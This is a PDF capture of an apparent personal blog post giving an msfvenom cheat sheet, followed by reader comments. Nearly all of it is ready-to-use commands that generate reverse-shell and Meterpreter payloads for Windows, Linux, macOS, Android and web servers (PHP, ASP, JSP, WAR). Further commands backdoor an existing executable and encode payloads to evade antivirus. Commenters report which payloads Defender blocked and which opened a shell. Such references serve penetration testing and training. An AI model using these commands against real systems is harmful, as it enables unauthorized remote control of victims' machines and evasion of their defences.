Msfvenom Cheat Sheet
Msfvenom Cheat Sheet
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and
msfencode.
Binaries
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Command Info
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS Creates a simple TCP
IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Payload for Windows
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS Creates a simple HTTP
IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe Payload for Windows
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS Creates a simple TCP
IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Shell for Linux
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} Creates a simple TCP
LPORT={PORT / Forwarded PORT} -f macho > example.macho Shell for Mac
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS Creats a simple TCP
IP} LPORT={PORT / Forwarded PORT} R > example.apk Payload for Android
Web Payloads
Command Info
msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} Creats a Simple TCP
LPORT={PORT / Forwarded PORT} -f raw > example.php Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} Creats a Simple TCP
LPORT={PORT / Forwarded PORT} -f asp > example.asp Shell for ASP
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT= Creats a Simple TCP
{PORT / Forwarded PORT} -f raw > example.jsp Shell for Javascript
msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT= Creats a Simple TCP
{PORT / Forwarded PORT} -f war > example.war Shell for WAR
Windows Payloads
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Command Info
Lists all avalaible
msfvenom -l encoders
encoders
Binds an exe with a
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=
Payload (Backdoors an
{DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe
exe)
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS Creates a simple TCP
IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f payload with
exe > example.exe shikata_ga_nai encoder
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST=
Binds an exe with a
{DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e
Payload and encodes it
x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe
Comments
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
8 Comments nitesculucian
1 Login
LOG IN WITH
OR SIGN UP WITH DISQUS ?
Name
But after your response I decided to try again. This time I followed the git instructions to the
letter. But I must tell you the setup.py routine is a literal nightmare. It jumps all over the
place, intersperses error message and gives you not a clue as to what needs to be done.
Yet it did install this time. So, I selected module #49 (ruby/meterpreter/new_tcp) and it
generated an executable which I immediately copied to my Windows box. But when I ran it:
"the file or folder is corruptible and unreadable"
Now I have spent a lot of time on other packages and gotten them to work, e.g. gophish,
free-radius, eclipse etc. I would appreciate it if you give me some suggestions?
Thanks,
△ ▽ • Reply • Share ›
The simple Windows payload was busted by Windows in every transfer method I
tried, including http and ftp.
The HTTP Payload was transferred successfully with my Python server but Defender
would not let it run.
I did not try the three Linux payloads as I'm only interested in Windows at this time.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Amazingly, the PHP Web Payload worked! Firefox on Windows loaded it and it
opened a meterpreter shell on Kali. I will pursue this further for sure.
I do not have server software for .asp, .jsp or .war but it would appear they also quite
possibly would work.
1△ ▽ • Reply • Share ›
I'll get back to you on this soon. yes i have a small lab. i also do a lot
of field work. Im' about an hour out of Los Angeles
△ ▽ • Reply • Share ›
ALSO ON NITESCULUCIAN
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
request from PostBin?
© Lucian Nitescu - Powered by Jekyll & whiteglass - Subscribe via RSS | Privacy Policy | Legal Disclaimer
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD